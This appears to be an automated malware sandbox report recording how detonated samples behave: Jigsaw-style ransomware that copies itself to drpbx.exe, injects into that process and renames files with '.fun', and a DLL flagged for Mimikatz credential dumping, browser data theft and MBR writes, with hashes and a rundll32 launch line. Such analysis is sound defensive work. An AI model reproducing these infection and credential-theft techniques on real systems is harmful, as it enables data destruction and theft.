File opened for modification C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.11629.20316.0_x64__8wekyb3d8bbwe\images\contrast-black\HxMailAppList.scale-150.png C:\Users\Admin\AppData\Local\Drpbx\drpbx.exe N/A
File opened for modification C:\Program Files\Microsoft Office\root\fre\StartMenu_Win10.mp4 C:\Users\Admin\AppData\Local\Drpbx\drpbx.exe N/A
File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\activity-badge\js\selector.js.fun C:\Users\Admin\AppData\Local\Drpbx\drpbx.exe N/A
File opened for modification C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.11629.20316.0_x64__8wekyb3d8bbwe\images\OutlookMailLargeTile.scale-200.png C:\Users\Admin\AppData\Local\Drpbx\drpbx.exe N/A
File opened for modification C:\Program Files\WindowsApps\DeletedAllUserPackages\Microsoft.DesktopAppInstaller_1.0.30251.0_neutral_split.scale-100_8wekyb3d8bbwe\Assets\AppPackageWideTile.scale-100.png C:\Users\Admin\AppData\Local\Drpbx\drpbx.exe N/A
File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\file_types\themes\dark\s_shared_multi_filetype.svg.fun C:\Users\Admin\AppData\Local\Drpbx\drpbx.exe N/A
File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\ob-preview\images\themeless\accessibility_poster.jpg.fun C:\Users\Admin\AppData\Local\Drpbx\drpbx.exe N/A
File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\unified-share\js\nls\tr-tr\ui-strings.js.fun C:\Users\Admin\AppData\Local\Drpbx\drpbx.exe N/A
File opened for modification C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.11629.20316.0_x64__8wekyb3d8bbwe\images\OutlookMailSmallTile.scale-400.png C:\Users\Admin\AppData\Local\Drpbx\drpbx.exe N/A
File opened for modification C:\Program Files\WindowsApps\Microsoft.YourPhone_0.19051.7.0_x64__8wekyb3d8bbwe\Assets\AppTiles\contrast-black\AppIcon.targetsize-96_altform-unplated_contrast-black.png C:\Users\Admin\AppData\Local\Drpbx\drpbx.exe N/A
File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\editpdf\js\plugins\editpdf-tool-view.js C:\Users\Admin\AppData\Local\Drpbx\drpbx.exe N/A
File opened for modification C:\Program Files\WindowsApps\Microsoft.Office.OneNote_16001.12026.20112.0_x64__8wekyb3d8bbwe\images\contrast-white\OneNoteSectionWideTile.scale-200.png C:\Users\Admin\AppData\Local\Drpbx\drpbx.exe N/A
File opened for modification C:\Program Files\WindowsApps\Microsoft.SkypeApp_14.53.77.0_neutral_split.scale-100_kzf8qxf38zg5c\Assets\Images\SkypeMedTile.scale-100.png C:\Users\Admin\AppData\Local\Drpbx\drpbx.exe N/A
File opened for modification C:\Program Files\WindowsApps\Microsoft.VP9VideoExtensions_1.0.22681.0_x64__8wekyb3d8bbwe\Assets\contrast-white\AppList.scale-200_contrast-white.png C:\Users\Admin\AppData\Local\Drpbx\drpbx.exe N/A

Enumerates physical storage devices

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 744 wrote to memory of 4828 N/A C:\Users\Admin\AppData\Local\Temp\jigsaw.exe C:\Users\Admin\AppData\Local\Drpbx\drpbx.exe
PID 744 wrote to memory of 4828 N/A C:\Users\Admin\AppData\Local\Temp\jigsaw.exe C:\Users\Admin\AppData\Local\Drpbx\drpbx.exe

Processes

C:\Users\Admin\AppData\Local\Temp\jigsaw.exe

"C:\Users\Admin\AppData\Local\Temp\jigsaw.exe"

C:\Users\Admin\AppData\Local\Drpbx\drpbx.exe

"C:\Users\Admin\AppData\Local\Drpbx\drpbx.exe" C:\Users\Admin\AppData\Local\Temp\jigsaw.exe

Network

Country Destination Domain Proto
US 8.8.8.8:53 8.8.8.8.in-addr.arpa udp
US 8.8.8.8:53 241.150.49.20.in-addr.arpa udp
US 8.8.8.8:53 172.210.232.199.in-addr.arpa udp
US 8.8.8.8:53 95.221.229.192.in-addr.arpa udp
US 8.8.8.8:53 56.163.245.4.in-addr.arpa udp
US 8.8.8.8:53 15.164.165.52.in-addr.arpa udp
US 8.8.8.8:53 134.71.91.104.in-addr.arpa udp
US 8.8.8.8:53 172.214.232.199.in-addr.arpa udp

Files

memory/744-0-0x00007FFEC70A5000-0x00007FFEC70A6000-memory.dmp

memory/744-1-0x00007FFEC6DF0000-0x00007FFEC7791000-memory.dmp

memory/744-2-0x000000001B3B0000-0x000000001B3E8000-memory.dmp

memory/744-3-0x00007FFEC6DF0000-0x00007FFEC7791000-memory.dmp

memory/744-4-0x000000001B990000-0x000000001BE5E000-memory.dmp

memory/744-5-0x000000001BF00000-0x000000001BF9C000-memory.dmp

C:\Users\Admin\AppData\Local\Drpbx\drpbx.exe

MD5 2773e3dc59472296cb0024ba7715a64e
SHA1 27d99fbca067f478bb91cdbcb92f13a828b00859
SHA256 3ae96f73d805e1d3995253db4d910300d8442ea603737a1428b613061e7f61e7
SHA512 6ef530b209f8ec459cca66dbf2c31ec96c5f7d609f17fa3b877d276968032fbc6132ea4a45ed1450fb6c5d730a7c9349bf4481e28befaea6b119ec0ded842262

memory/744-19-0x00007FFEC6DF0000-0x00007FFEC7791000-memory.dmp

memory/4828-20-0x00007FFEC6DF0000-0x00007FFEC7791000-memory.dmp

memory/4828-21-0x00007FFEC6DF0000-0x00007FFEC7791000-memory.dmp

memory/4828-22-0x00007FFEC6DF0000-0x00007FFEC7791000-memory.dmp

memory/4828-23-0x00000000016C0000-0x00000000016C8000-memory.dmp

memory/4828-24-0x00007FFEC6DF0000-0x00007FFEC7791000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\{562D540A-FF15-4D86-B4BE-81579BF660FF} - OProcSessId.dat.fun

MD5 8ebcc5ca5ac09a09376801ecdd6f3792
SHA1 81187142b138e0245d5d0bc511f7c46c30df3e14
SHA256 619e246fc0ac11320ff9e322a979948d949494b0c18217f4d794e1b398818880
SHA512 cec50bfc6ad2f57f16da99459f40f2d424c6d5691685fa1053284f46c8c8c8a975d7bcb1f3521c4f3fbdc310cf4714e29404aa23be6021e2e267c97b090dc650

C:\Program Files\Java\jdk-1.8\jre\lib\images\cursors\invalid32x32.gif.fun

MD5 580ee0344b7da2786da6a433a1e84893
SHA1 60f8c4dd5457e9834f5402cb326b1a2d3ca0ba7e
SHA256 98b6c2ddfefc628d03ceaef9d69688674a6bc32eb707f9ed86bc8c75675c4513
SHA512 356d2cdea3321e894b5b46ad1ea24c0e3c8be8e3c454b5bd300b7340cbb454e71fc89ca09ea0785b373b483e67c2f6f6bb408e489b0de4ff82d5ed69a75613ba

C:\Program Files (x86)\Common Files\Adobe\Reader\DC\Linguistics\LanguageNames2\DisplayLanguageNames.en_US_POSIX.txt.fun

MD5 829165ca0fd145de3c2c8051b321734f
SHA1 f5cc3af85ab27c3ea2c2f7cbb8295b28a76a459e
SHA256 a193ee2673e0ba5ebc5ea6e65665b8a28bd7611f06d2b0174ec2076e22d94356
SHA512 7d380cda12b342a770def9d4e9c078c97874f3a30cd9f531355e3744a8fef2308f79878ffeb12ce26953325cb6a17bc7e54237dfdc2ee72b140ec295676adbcb

C:\Users\Admin\AppData\Local\Packages\Microsoft.AccountsControl_cw5n1h2txyewy\Settings\settings.dat.fun

MD5 f22599af9343cac74a6c5412104d748c
SHA1 e2ac4c57fa38f9d99f3d38c2f6582b4334331df5
SHA256 36537e56d60910ab6aa548e64ca4adafdcabde9d60739013993e12ba061dfd65
SHA512 5c8afc025e1d8342d93b7842dc7ef22eca61085857a80a08ba9b3f156ee3b814606bb32bc244bd525a7913e7915bdf3a86771d39577f4a1176ade04dc381c6d4

C:\Users\Admin\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\DeviceSearchCache\AppCache133727662745216155.txt.fun

MD5 84b14c0b386167ead365a9b9e59ea3fb
SHA1 e1208de8f990375457a717e56ab029854d2f884e
SHA256 47831e61dc8d3592aea999494aec6832c8916d5a61e66061fee4a5f2e085adca
SHA512 b82c5f58fa61de7910831d7758833c8ec800e9ce14e684723d8daa88d1a601dfa6a35296ad150489d4a6cae070f1ec702d45e96041c5cbdb751e7e8cf0218d85

C:\Users\Admin\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\DeviceSearchCache\AppCache133727664176773847.txt.fun

MD5 7e2b71326c97cbb411d0593dfa481681
SHA1 7ef3573dfbae2f60c0ae4403371a8b491be14165
SHA256 8664ead4f29996331eab64768cd21ed56f37d0a1669d78dc8c172f7a6d0770cd
SHA512 63c628c4fea4d572348d083f0bfda8724d3c23c5c9abcf292c76c7e7beea8672a04b5c9e1b1c23370e1ac652c580697a2e0fbd796799df805c7136dd2b7af443

C:\Users\Admin\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\DeviceSearchCache\AppCache133727670801391576.txt.fun

MD5 b83af47bb28d058a28d51212854a18b3
SHA1 3c69b6d1f8d0bbf3e7e090f78f41595ad766de4e
SHA256 41f5e91acda82bbf5ae94ab86b02aaccf6b39d3af9a0c9d32527fdadb39caf72
SHA512 b17f1317b1c1c0207f4eca9868e8ae99ceb57317a56df7d198ffc140f83ae64615e1462e973be0fd8070b2e9bb3b78d7ac76739480f3c236b53fd60e93463393

C:\Users\Admin\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\DeviceSearchCache\AppCache133771083036641091.txt.fun

MD5 e815da01303d7539ca0f8aebb61063f5
SHA1 e5b18401553df9d34ae349fee78f0ca747a0cab3
SHA256 58cafc7981122f4e37ae6b3792c38d296d8fe36761338734910faec23c9554a8
SHA512 6172aefd5215aa40c0f74d90b3e27a95763fb97a7ddde25c2b9d0c777536d9cc1a2da4d1b9cf56bd93ceea2223be5b99311af7a26ef5c3f206dab9f03e0ab90d

C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\themes\dark\s_remove_18.svg.fun

MD5 75a585c1b60bd6c75d496d3b042738d5
SHA1 02c310d7bf79b32a43acd367d031b6a88c7e95ed
SHA256 5ebbfc6df60e21044486a5df3cb47ccdcd7a4d5f197804555715ffd9bf6c5834
SHA512 663a302e651b9167f4c4e6ae30028307b4d8da0dda3a0e5fd414104951d50419862fc9396c5b39fe5c4b696efd3efbf0b575688983b1d341f3ef38becf500505

C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\exportpdfupsell-app\images\rhp_world_icon.png.fun

MD5 880833ad1399589728c877f0ebf9dce0
SHA1 0a98c8a78b48c4b1b4165a2c6b612084d9d26dce
SHA256 7a27d891097df183fbf0031e3894bdac0ce77aef15d666ddd9f6a04e9836fb27
SHA512 0ddf247892a72a390437390d535debf6e41d12e51b31eb4f0353b710ec380c5fbc531a48e76935088063a41aca843287d3def9c1cd46be05b8dcb69f5017a464

C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\exportpdfupsell-app\images\rhp_world_icon_2x.png.fun

MD5 409a8070b50ad164eda5691adf5a2345
SHA1 e84e10471f3775d5d706a3b7e361100c9fbfaf74
SHA256 a91790b778026db625c9dedfe1c6d94b884818b33d7977e86b2f9c2f3c500796
SHA512 767a75edd37d29b3433040ce21cda849cd11ba549f27581f7edc6416c433ba7047c56908d40956422393ab0f35ede61617d4bd2aad0bde3d1ebd276584c858c7

C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\exportpdfupsell-app\images\rhp_world_icon_hover_2x.png.fun

MD5 e092d14d26938d98728ce4698ee49bc3
SHA1 9f8ee037664b4871ec02ed6bba11a5317b9e784a
SHA256 5e8ec278a273be22199884d519a79f748801baa3a45b76e57569fdfffe96e7fb
SHA512 b2fcb5d46339cdf6b5a954f2a083cf913779e57cb6e8699bc5da1fba1c370c41117b7ddefb50075622067eb7b02a20268bc047171bd883bcda4a497c2ec64ea4

C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\exportpdfupsell-app\images\rhp_world_icon_hover.png.fun

MD5 2884524604c89632ebbf595e1d905df9
SHA1 b6053c85110b0364766e18daab579ac048b36545
SHA256 ae2facd997527426fc4def82e0db68be29b44499bfff86a28c36f7c31b177d4f
SHA512 0b506397627823a1768796129c6b37d146821471b89338b5f2d0fd3aea707fd46a8e197ee0e298ddfb3b50eef0a0b064946006346b060f733ef19cbd5d24fc90

C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\generic-rhp-app\images\example_icons.png.fun

MD5 65368c6dd915332ad36d061e55d02d6f
SHA1 fb4bc0862b192ad322fcb8215a33bd06c4077c6b
SHA256 6f9c7ebec5a707de439e3fd2e278fdfa07a39465d56157b70b24f091509bf76f
SHA512 8bb9a7690aeb3c0b9e14e1a6ebc5741536d354cf2324fd74ee0c3e4ef511718f7795039a94c8d2df94b6e6d0fb1762191cb649089d1def12abdf34003f0cdd0f

C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\generic-rhp-app\images\example_icons2x.png.fun

MD5 0d35b2591dc256d3575b38c748338021
SHA1 313f42a267f483e16e9dd223202c6679f243f02d
SHA256 1ca0cfc2df0354c8d886285ae5e743d9c7cc030e1afd68ac113c0f2ce43ad5fa
SHA512 f6c58c27bbde7508a866bd0e7fabadb13a4f020378cd8b8cfc0c9fa23f645d811d6cdea04b81afdf30c064c6248152e74b3e6a78ec7a3d1d19037a0db8897d7e

C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\search-summary\js\nls\ui-strings.js.fun

MD5 433755fcc2552446eb1345dd28c924eb
SHA1 23863f5257bdc268015f31ab22434728e5982019
SHA256 d6c290e942ee665d71e288229423a1f1866842988eac01f886910b0ec383aa9b
SHA512 de83b580ce27012a7677e1da867c91e2a42dbc6b5872dcf756ace51c2862801814665ecca997171f2e550e8b9a3de19994d2516a4e5d4d57e16c7b4b823236c0

C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\signatures\js\nls\ui-strings.js.fun

MD5 781ed8cdd7186821383d43d770d2e357
SHA1 99638b49b4cfec881688b025467df9f6f15371e8
SHA256 a955039cd9e53674395f4b758218e4d59c89e99a0c4d2a909e49f6008b8f5dd4
SHA512 87cb9c4288586df232200f7bbacee3dee04f31c9444902dd369ad5c392d71e9837ebf8b3bb0fcb4a5db8a879cf757e97ce248939e3316c6bf3a3fe7cbe579534

C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\add-account\images\themes\dark\icons.png.fun

MD5 72269cd78515bde3812a44fa4c1c028c
SHA1 87cada599a01acf0a43692f07a58f62f5d90d22c
SHA256 7c78b3da50c1135a9e1ecace9aea4ea7ac8622d2a87b952fc917c81010c953f7
SHA512 3834b7a8866e8656bbdbf711fc400956e9b7a14e192758f26ccf31d8f6ab8e34f7b1983c1845dc84e45ff70555e423d54a475f6a668511d3bcbdd1d460eeb4b0

C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\add-account\images\themes\dark\icons_ie8.gif.fun

MD5 eda4add7a17cc3d53920dd85d5987a5f
SHA1 863dcc28a16e16f66f607790807299b4578e6319
SHA256 97f6348eaa48800e603d11fa22c62e10682ad919e7af2b2e59d6bd53937618f2
SHA512 d59fa9648dc7cb76a5163014f91b6d65d33aaa86fc9d9c73bf147943a3254b4c4f77f06b2e95bb8f94246a982ea466eb33dac9573dd62f40953fd23de1c1b498

C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\add-account\images\themes\dark\icons_retina.png.fun

MD5 7dbb12df8a1a7faae12a7df93b48a7aa
SHA1 07800ce598bee0825598ad6f5513e2ba60d56645
SHA256 aecde4eb94a19095495d76ef3189a9abd45bcfd41acbed7705d22b4c7d00aa77
SHA512 96e454ebb4c96573e8edc6822290c22d425f4c7f7adbab35e6dc4b3ce04a5916ae9254c2c312c98299835ecbf3c5aa95da2939b8408ac25fbae44ba87a3795dc

C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\add-account\images\themes\dark\new_icons.png.fun

MD5 82a2e835674d50f1a9388aaf1b935002
SHA1 e09d0577da42a15ec1b71a887ff3e48cfbfeff1a
SHA256 904372666ca3c40f92b20317d92ca531678958affbc34591401e338146fe0ecb
SHA512 b10a8e384d0bd088443a5085f5c22a296f6f4d295a053d4526690ba65846e887daec47d01cf18fdf1160db98061a8b7c4040de56e6e604451a821fadccf32698

C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\add-account\images\themes\dark\new_icons_retina.png.fun

MD5 150c9a9ed69b12d54ada958fcdbb1d8a
SHA1 804c540a51a8d14c6019d3886ece68f32f1631d5
SHA256 2dee41184747742fbdc527b2023d67fecec1ccdfdf258439a06cd75d4fd33f43
SHA512 70193ee6f0919eb14311f43b5a5da041deacb568db55fc43290ee76e17af902ac468435b37a150630ea3b7871c724073915ae5dcba3c301ac42f2d68dd598e2f

C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\exportpdfupsell-app\images\themes\dark\rhp_world_icon.png.fun

MD5 0c680b0b1e428ebc7bff87da2553d512
SHA1 f801dedfc3796d7ec52ee8ba85f26f24bbd2627c
SHA256 9433084e61062d2b709c1390e298ddaf3fb0226656662c04c0b7026a44dee750
SHA512 2d1399a6bf225b048d2b12656e941ad912636acae2dec387f92f33ac80629a1e504bca63580ba73a8ed073788f697274d5eb76ea1b089f0555fd397a8f5cbbff

C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\exportpdfupsell-app\images\themes\dark\rhp_world_icon_2x.png.fun

MD5 be26a499465cfbb09a281f34012eada0
SHA1 b8544b9f569724a863e85209f81cd952acdea561
SHA256 9095e9b4759e823e96984981af41b7a9915a5ecaa6be769f89c13484cef9e0f5
SHA512 28196e5de9670e9f63adcf648368bd3ea5926a03e28a13adc2fb69c567fba2f84e4f162637c487acb64eda2e30993f849806f2313820ba693c7e70303542d04f

C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\exportpdfupsell-app\images\themes\dark\rhp_world_icon_hover.png.fun

MD5 2de4e157bf747db92c978efce8754951
SHA1 c8d31effbb9621aefac55cf3d4ecf8db5e77f53d
SHA256 341976b4fe312824d02512d74770a6df9e1c37123781655532bd9cd97ea65fa9
SHA512 3042a742c38434ae3ee4fe10f7137462cdebad5cae0f9a85fb61063d15a30e1b54ac878b1af65f699c6ca1a9d2c3e58d245e54bdebfadc460cbd060836734e11

C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\exportpdfupsell-app\images\themes\dark\rhp_world_icon_hover_2x.png.fun

MD5 ad091690b979144c795c59933373ea3f
SHA1 5d9e481bc96e6f53b6ff148b0da8417f63962ada
SHA256 7805ac9d0e05d560023e5aabed960d842e4f3ec2aa3db45a9cfb541688e2edb1
SHA512 23b4c799a7b25f70962e8dd0ec7286ba7150053cab7c88f5fb1efc1095c2987bd6f3572e7fb3ee4b2238958e52a763de2c84a74615df7a6d3a19a034584fd687

C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-computer\images\themes\dark\bg_patterns_header.png.fun

MD5 6e333be79ea4454e2ae4a0649edc420d
SHA1 95a545127e10daea20fd38b29dcc66029bd3b8bc
SHA256 112f72ef2bc57de697b82b731775fba3f518d1ae072120cd11b732bf4a782e36
SHA512 bed5906c7373814acc8a54c1631428a17f0aa69282920447a1575d8db826afd5dab262301dc6da610ff8bb81d24ec6babd3d9fb99fd6945f1aca9cb9c76ec2c9

C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-computer\images\themes\dark\bg_pattern_RHP.png.fun

MD5 b8454390c3402747f7c5e46c69bea782
SHA1 e922c30891ff05939441d839bfe8e71ad9805ec0
SHA256 76f8ed1dd50e50c7d62b804a0d6901a93e5534787d7b38467933d4c12ce98a0d
SHA512 22b26c62473e80d17c1f78df14757ccfb6c7175faa541705edc153c02baa7ab0982b5daabe8dd2c8c9efb92af81f55ccaeeecffe8ed9a0b3c26e89135ca50923

C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-computer\images\themes\dark\illustrations.png.fun

MD5 3ae8789eb89621255cfd5708f5658dea
SHA1 6c3b530412474f62b91fd4393b636012c29217df
SHA256 7c5b1d8469e232a58359ccbcb89e619c81c20e6d2c7579e4292eb9a19849bc5a
SHA512 f6998dbae1a2fa56f962045261a11a50b8e03573d9d4cf39083da3be341cc104e0ecf5908076f03961bcdb1356d05a7450d69940ec3aaab73623a6fe180e7051

C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-computer\images\themes\dark\illustrations_retina.png.fun

MD5 b7c62677ce78fbd3fb9c047665223fea
SHA1 3218c7b6fd8be5e0a8b67d3953d37d5dbd0c71d8
SHA256 aa638be6e1107ed1f14e8430abedd6f6d0a837a31b1b63e6a7741d6d417eddc2
SHA512 9e0cc29835845f2a0260a6989c1b362bac22a8e0c2825bc18f1dde812ce7868503881d2deaf951429a80b5017b6ce31e785ff524883e08d730aa38b36a2fb074

C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\ob-preview\js\nls\en-gb\ui-strings.js.fun

MD5 117d6f863b5406cd4f2ac4ceaa4ba2c6
SHA1 5cac25f217399ea050182d28b08301fd819f2b2e
SHA256 73acdc730d8a9ec8f340c724b4db96fc222bb1eaf836cec69dfe3fab8d6ac362
SHA512 e10883029c1e0fbc64bec9aac0a6957a8499af255e1790843717212077926474e02b2870c5dd04b057c956b97ad4bb1747fe73e731ea61b891f4b38dd80494d7

C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\tracked-send\js\plugins\tracked-send\images\bun.png.fun

MD5 51da980061401d9a49494b58225b2753
SHA1 3445ffbf33f012ff638c1435f0834db9858f16d3
SHA256 3fb25ddd378ab756ec9faa56f16b76691cf6d9c7405bb9a09ce542a6f5b94e44
SHA512 ecc5eb2a045ce2508d461b999f16caba6cce55aa0c00b34bd73a33e0458795f93a77caff5026212912684164057be016f51dc57ec83821c2a1f2e27417c47b2c

C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\tracked-send\js\plugins\tracked-send\images\cstm_brand_preview.png.fun

MD5 2863e8df6fbbe35b81b590817dd42a04
SHA1 562824deb05e2bfe1b57cd0abd3fc7fbec141b7c
SHA256 7f1238332901b740cde70db622abcfb533fc02f71e93101340073552f4820dad
SHA512 7b2d95465ea66951ea05c341549535a0a939d26dbde365b212e3983e4047fa6912c37d737cb8054c41bb1a7d92586d968a0154c666572a70ebc59a4776897f38

C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\tracked-send\js\plugins\tracked-send\images\cstm_brand_preview2x.png.fun

MD5 79f6f006c95a4eb4141d6cedc7b2ebeb
SHA1 012ca3de08fb304f022f4ea9565ae465f53ab9e8
SHA256 e9847d0839d3cf1039bebdc49820ee7813d70941347ce420990592e5e3bd998e
SHA512 c143a4cf1ccfa98039b73214978722408188535ee4aa3dac08a34760b94bdf6d36ad0ff0de893da5b17fd69c96a6dfb25098ab7fec219fad1a77532113d0353e

C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\tracked-send\js\plugins\tracked-send\images\dd_arrow_small.png.fun

MD5 b88e3983f77632fa21f1d11ac7e27a64
SHA1 03a2b008cc3fe914910b0250ed4d49bd6b021393
SHA256 8469b8a64e80d662eec71c50513f6d295ef4a3a9992763dbcac9d81253cef9d5
SHA512 5bf93d4f4250ca96169f3d27d4e648cc5d6e00b7558a3ef32e07edcbae36dadb8008d7ba5f83ac3ed812b72c9d52730e866191b4de7a339df57b5697e00df50d

C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\tracked-send\js\plugins\tracked-send\images\dd_arrow_small2x.png.fun

MD5 f77086a1d20bca6ba75b8f2fef2f0247
SHA1 db7c58faaecd10e4b3473b74c1277603a75d6624
SHA256 cf10d2a22b638cf0978cf30ecaf39ecb5bb0e3ad78cd920afa433ad60cc1290d
SHA512 a77a897c0b41f4052cb9546d4cfd6e0856b288b6b8583a86d6c7e79059a05b19cc2593599251581e79107235e9d5cd589c392bf490452be04ff57e944cd19df3

C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\tracked-send\js\plugins\tracked-send\images\nub.png.fun

MD5 e03c9cd255f1d8d6c03b52fee7273894
SHA1 d0e9a9e6efd1746bc9ccb4eb8e7701c1cd707e2e
SHA256 22a34c8321384fc7682102e40d082e7812232a9109e4d4e8fa2152fda3f260f6
SHA512 d4bd002197b725316e1f1f2dd0a70ee44a82a53ac0dafa8c6b1166343adc406e147d0c4cca30d65a32aa545f1b327c6b69c0ec1d15330af48a6faa234dc4b5ac

C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\tracked-send\js\plugins\tracked-send\images\share_icons.png.fun

MD5 62b1443d82968878c773a1414de23c82
SHA1 192bbf788c31bc7e6fe840c0ea113992a8d8621c
SHA256 4e96529c023168df8dde241a9acdbf4788ea65bc35605e18febff2b2071f1e24
SHA512 75c8604ea65e0cdd9ea74b4802930444dd16a945da1e7f0af4a9a3762259ee9eb41ea96973555d06f4814ee2f6b73ab662c6b314b97876e9628fa5d4536e771c

C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\tracked-send\js\plugins\tracked-send\images\share_icons2x.png.fun

MD5 bca915870ae4ad0d86fcaba08a10f1fa
SHA1 7531259f5edae780e684a25635292bf4b2bb1aac
SHA256 d153ed6c5ea8c2c2f1839f8dadcc730f61bd8cd86ad732bab002a258dea1d037
SHA512 03f23de6b0ae10e63c41e73308b3844d49379c55d2df75fa1dc00771b26253d832c21081d8289f04260369df996e31273b7c0788cf3b5c78a27ec909f14a283a

C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\tracked-send\js\viewer\nls\nl-nl\ui-strings.js.fun

MD5 14145467d1e7bd96f1ffe21e0ae79199
SHA1 5db5fbd88779a088fd1c4319ff26beb284ad0ff3
SHA256 7a75b8ec8809c460301f30e1960b13c518680792e5c743ce7e9a7f691cfafc38
SHA512 762d499c54c5a25aba4357a50bb4e6b47451babeda84fa62cfbd649f8350bca55204ad002883b9147e78dda3dbabaae8da1dc94b716204226bb53326030772b7

memory/4828-3793-0x00007FFEC6DF0000-0x00007FFEC7791000-memory.dmp

memory/4828-3794-0x00007FFEC6DF0000-0x00007FFEC7791000-memory.dmp

memory/4828-3795-0x00007FFEC6DF0000-0x00007FFEC7791000-memory.dmp

Analysis: behavioral13

Detonation Overview

Submitted

2024-11-26 15:24

Reported

2024-11-26 15:27

Platform

win7-20240708-en

Max time kernel

149s

Max time network

151s

Command Line

rundll32.exe C:\Users\Admin\AppData\Local\Temp\027cc450ef5f8c5f653329641ec1fed9.dll,#1

Signatures

Mimikatz

mimikatz

Mimikatz family

mimikatz

mimikatz is an open source tool to dump credentials on Windows

Description Indicator Process Target
N/A N/A N/A N/A

Deletes itself

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\rundll32.exe N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\B3F4.tmp N/A

Loads dropped DLL

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\rundll32.exe N/A
N/A N/A C:\Windows\SysWOW64\rundll32.exe N/A
N/A N/A N/A N/A

Reads user/profile data of web browsers

spyware stealer

Writes to the Master Boot Record (MBR)

bootkit persistence
Description Indicator Process Target
File opened for modification \??\PhysicalDrive0 C:\Windows\SysWOW64\rundll32.exe N/A

Drops file in Program Files directory

Description Indicator Process Target
File opened for modification C:\Program Files (x86)\Microsoft Visual Studio 8\Common7\IDE\VSTA\ItemTemplates\CSharp\1033\UserControl.zip C:\Windows\SysWOW64\rundll32.exe N/A
File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Reader\IDTemplates\ENU\AdobeID.pdf C:\Windows\SysWOW64\rundll32.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\FORMS\1033\TASKDEC.CFG C:\Windows\SysWOW64\rundll32.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Visual Studio 8\Common7\IDE\VSTA\ItemTemplates\CSharp\1033\AppConfigInternal.zip C:\Windows\SysWOW64\rundll32.exe N/A
File opened for modification C:\Program Files\Internet Explorer\en-US\eula.rtf C:\Windows\SysWOW64\rundll32.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\FORMS\1033\POSTIT.CFG C:\Windows\SysWOW64\rundll32.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Visual Studio 8\Common7\IDE\VSTA\ItemTemplates\CSharp\1033\EmptyDatabase.zip C:\Windows\SysWOW64\rundll32.exe N/A
